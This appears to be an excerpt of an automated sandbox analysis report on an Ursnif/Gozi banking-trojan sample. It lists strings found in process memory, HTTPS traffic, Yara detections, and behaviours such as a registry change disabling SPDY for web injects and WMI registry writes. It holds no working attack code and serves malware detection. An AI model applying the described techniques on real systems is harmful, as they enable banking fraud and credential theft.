Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.baidu.com/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.baidu.com/favicon.ico
Source: explorer.exe, 00000025.00000000.458182273.000000000BC30000.00000002.00000001.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.cdiscount.com/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.cdiscount.com/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.ceneo.pl/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.ceneo.pl/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.cjmall.com/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.cjmall.com/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.clarin.com/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.cnet.co.uk/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.cnet.com/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.dailymail.co.uk/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.dailymail.co.uk/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.docUrl.com/bar.htm
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.etmall.com.tw/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.etmall.com.tw/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.excite.co.jp/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.expedia.com/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.expedia.com/favicon.ico
Source: explorer.exe, 00000025.00000000.458182273.000000000BC30000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000025.00000000.458182273.000000000BC30000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000025.00000000.458182273.000000000BC30000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000025.00000000.458182273.000000000BC30000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000025.00000000.458182273.000000000BC30000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000025.00000000.458182273.000000000BC30000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000025.00000000.458182273.000000000BC30000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000025.00000000.458182273.000000000BC30000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000025.00000000.458182273.000000000BC30000.00000002.00000001.sdmp String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000025.00000000.458182273.000000000BC30000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000025.00000000.458182273.000000000BC30000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000025.00000000.458182273.000000000BC30000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: RuntimeBroker.exe, 00000027.00000002.578594602.000001E767A41000.00000004.00000001.sdmp String found in binary or memory: http://www.g5e.com/G5_End_User_License_Supplemental_Terms
Source: RuntimeBroker.exe, 00000027.00000002.578594602.000001E767A41000.00000004.00000001.sdmp String found in binary or memory: http://www.g5e.com/G5_End_User_License_Supplemental_TermsnVersio
Source: RuntimeBroker.exe, 00000027.00000002.578594602.000001E767A41000.00000004.00000001.sdmp String found in binary or memory: http://www.g5e.com/termsofservice
Source: explorer.exe, 00000025.00000000.458182273.000000000BC30000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000025.00000000.458182273.000000000BC30000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.gismeteo.ru/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.gmarket.co.kr/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.gmarket.co.kr/favicon.ico
Source: explorer.exe, 00000025.00000000.458182273.000000000BC30000.00000002.00000001.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.google.co.in/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.google.co.jp/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.google.co.uk/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.google.com.br/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.google.com.sa/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.google.com.tw/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.google.com/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.google.com/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.google.cz/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.google.de/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.google.es/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.google.fr/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.google.it/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.google.pl/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.google.ru/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.google.si/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.iask.com/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.iask.com/favicon.ico
Source: explorer.exe, 00000025.00000000.458182273.000000000BC30000.00000002.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.kkbox.com.tw/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.kkbox.com.tw/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.linternaute.com/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.maktoob.com/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.mercadolibre.com.mx/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.mercadolivre.com.br/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.merlin.com.pl/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.merlin.com.pl/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&amp;a=
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.mtv.com/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.mtv.com/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.myspace.com/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.najdi.si/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.najdi.si/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.nate.com/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.neckermann.de/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.neckermann.de/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.news.com.au/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.nifty.com/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.ocn.ne.jp/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.orange.fr/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.otto.de/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.ozon.ru/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.ozon.ru/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.ozu.es/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.paginasamarillas.es/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.paginasamarillas.es/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.pchome.com.tw/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.priceminister.com/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.priceminister.com/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.rakuten.co.jp/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.rambler.ru/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.rambler.ru/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.recherche.aol.fr/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.rtl.de/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.rtl.de/favicon.ico
Source: explorer.exe, 00000025.00000000.458182273.000000000BC30000.00000002.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000025.00000000.458182273.000000000BC30000.00000002.00000001.sdmp String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000025.00000000.458182273.000000000BC30000.00000002.00000001.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.servicios.clarin.com/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.shopzilla.com/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.sify.com/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.sogou.com/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.sogou.com/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.soso.com/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.soso.com/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.t-online.de/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.taobao.com/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.taobao.com/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.target.com/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.target.com/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.tchibo.de/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.tchibo.de/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.tesco.com/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.tesco.com/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
Source: explorer.exe, 00000025.00000000.458182273.000000000BC30000.00000002.00000001.sdmp String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.tiscali.it/favicon.ico
Source: explorer.exe, 00000025.00000000.458182273.000000000BC30000.00000002.00000001.sdmp String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.univision.com/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.univision.com/favicon.ico
Source: explorer.exe, 00000025.00000000.458182273.000000000BC30000.00000002.00000001.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.walmart.com/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.walmart.com/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.ya.com/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www.yam.com/favicon.ico
Source: explorer.exe, 00000025.00000000.458182273.000000000BC30000.00000002.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www3.fnac.com/
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://www3.fnac.com/favicon.ico
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&Version=2008-06-26&Operation
Source: explorer.exe, 00000025.00000000.461994020.000000000F993000.00000002.00000001.sdmp String found in binary or memory: http://z.about.com/m/a08.ico
Source: RuntimeBroker.exe, 00000027.00000002.578948445.000001E767B23000.00000004.00000001.sdmp String found in binary or memory: https://corp.roblox.com/contact/
Source: RuntimeBroker.exe, 00000027.00000002.578948445.000001E767B23000.00000004.00000001.sdmp String found in binary or memory: https://corp.roblox.com/parents/
Source: RuntimeBroker.exe, 00000027.00000002.578948445.000001E767B23000.00000004.00000001.sdmp String found in binary or memory: https://en.help.roblox.com/hc/en-us
Source: powershell.exe, 0000001A.00000002.447464468.0000028E4D040000.00000004.00000001.sdmp, powershell.exe, 0000001A.00000002.449500265.0000028E4D3EF000.00000004.00000001.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: RuntimeBroker.exe, 00000027.00000002.578594602.000001E767A41000.00000004.00000001.sdmp String found in binary or memory: https://instagram.com/hiddencity_
Source: powershell.exe, 0000001A.00000002.475950586.0000028E5D243000.00000004.00000001.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: explorer.exe, 00000025.00000000.457476881.0000000008BB0000.00000004.00000001.sdmp String found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp
Source: explorer.exe, 00000025.00000000.457290492.0000000008B68000.00000004.00000001.sdmp String found in binary or memory: https://www.msn.com/de-ch/?ocid=iehpMSN
Source: RuntimeBroker.exe, 00000027.00000002.578948445.000001E767B23000.00000004.00000001.sdmp String found in binary or memory: https://www.roblox.com/develop
Source: RuntimeBroker.exe, 00000027.00000002.578948445.000001E767B23000.00000004.00000001.sdmp String found in binary or memory: https://www.roblox.com/info/privacy
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown HTTPS traffic detected: 104.20.185.68:443 -> 192.168.2.5:49730 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.20.185.68:443 -> 192.168.2.5:49731 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49746 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49743 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49745 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49744 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49747 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49742 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif
Source: Yara match File source: 00000001.00000003.342289663.0000000005318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.342468816.0000000005318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.578433552.0000000003B8E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000002.570719578.000001E7666AE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.342346721.0000000005318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.412411530.0000000000500000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.342261211.0000000005318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.422060985.0000021EAC2F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000003.422165478.0000028E65B80000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.436183951.0000000000E50000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000003.432265518.0000000003070000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.342443739.0000000005318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.342379670.0000000005318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.352943845.000000000519B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.574832418.000002413CA4E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000000.437313666.0000000003B8E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.589013804.00000000066DE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.474554725.00000000001CE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.342460182.0000000005318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.342426080.0000000005318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4288, type: MEMORY
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4016, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 5236, type: MEMORY
Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 4616, type: MEMORY
Source: Yara match File source: Process Memory Space: control.exe PID: 6684, type: MEMORY

E-Banking Fraud:

Yara detected Ursnif
Source: Yara match File source: 00000001.00000003.342289663.0000000005318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.342468816.0000000005318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.578433552.0000000003B8E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000002.570719578.000001E7666AE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.342346721.0000000005318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.412411530.0000000000500000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.342261211.0000000005318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.422060985.0000021EAC2F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000003.422165478.0000028E65B80000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.436183951.0000000000E50000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000003.432265518.0000000003070000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.342443739.0000000005318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.342379670.0000000005318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.352943845.000000000519B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.574832418.000002413CA4E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000000.437313666.0000000003B8E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.589013804.00000000066DE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.474554725.00000000001CE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.342460182.0000000005318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.342426080.0000000005318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4288, type: MEMORY
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4016, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 5236, type: MEMORY
Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 4616, type: MEMORY
Source: Yara match File source: Process Memory Space: control.exe PID: 6684, type: MEMORY
Disables SPDY (HTTP compression, likely to perform web injects)
Source: C:\Windows\explorer.exe Registry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000025.00000002.578433552.0000000003B8E000.00000004.00000001.sdmp, type: MEMORY Matched rule: Win32.Gozi Author: CCN-CERT
Source: 00000027.00000002.570719578.000001E7666AE000.00000004.00000001.sdmp, type: MEMORY Matched rule: Win32.Gozi Author: CCN-CERT
Source: 00000022.00000003.422060985.0000021EAC2F0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Win32.Gozi Author: CCN-CERT
Source: 0000001A.00000003.422165478.0000028E65B80000.00000004.00000001.sdmp, type: MEMORY Matched rule: Win32.Gozi Author: CCN-CERT
Source: 00000025.00000003.432265518.0000000003070000.00000004.00000001.sdmp, type: MEMORY Matched rule: Win32.Gozi Author: CCN-CERT
Source: 00000026.00000002.574832418.000002413CA4E000.00000004.00000001.sdmp, type: MEMORY Matched rule: Win32.Gozi Author: CCN-CERT
Source: 00000025.00000000.437313666.0000000003B8E000.00000004.00000001.sdmp, type: MEMORY Matched rule: Win32.Gozi Author: CCN-CERT
Source: 00000025.00000002.589013804.00000000066DE000.00000004.00000001.sdmp, type: MEMORY Matched rule: Win32.Gozi Author: CCN-CERT
Source: 00000022.00000002.474554725.00000000001CE000.00000004.00000001.sdmp, type: MEMORY Matched rule: Win32.Gozi Author: CCN-CERT
Writes or reads registry keys via WMI
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
